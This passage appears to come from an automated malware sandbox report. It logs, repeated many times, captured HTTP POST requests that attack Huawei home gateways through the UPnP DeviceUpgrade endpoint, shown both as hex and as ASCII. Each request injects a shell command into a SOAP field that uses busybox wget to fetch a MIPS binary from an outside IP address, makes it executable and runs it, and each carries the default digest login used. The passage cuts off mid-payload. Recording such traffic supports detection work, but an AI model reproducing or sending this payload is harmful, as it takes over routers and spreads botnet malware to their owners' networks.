70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox 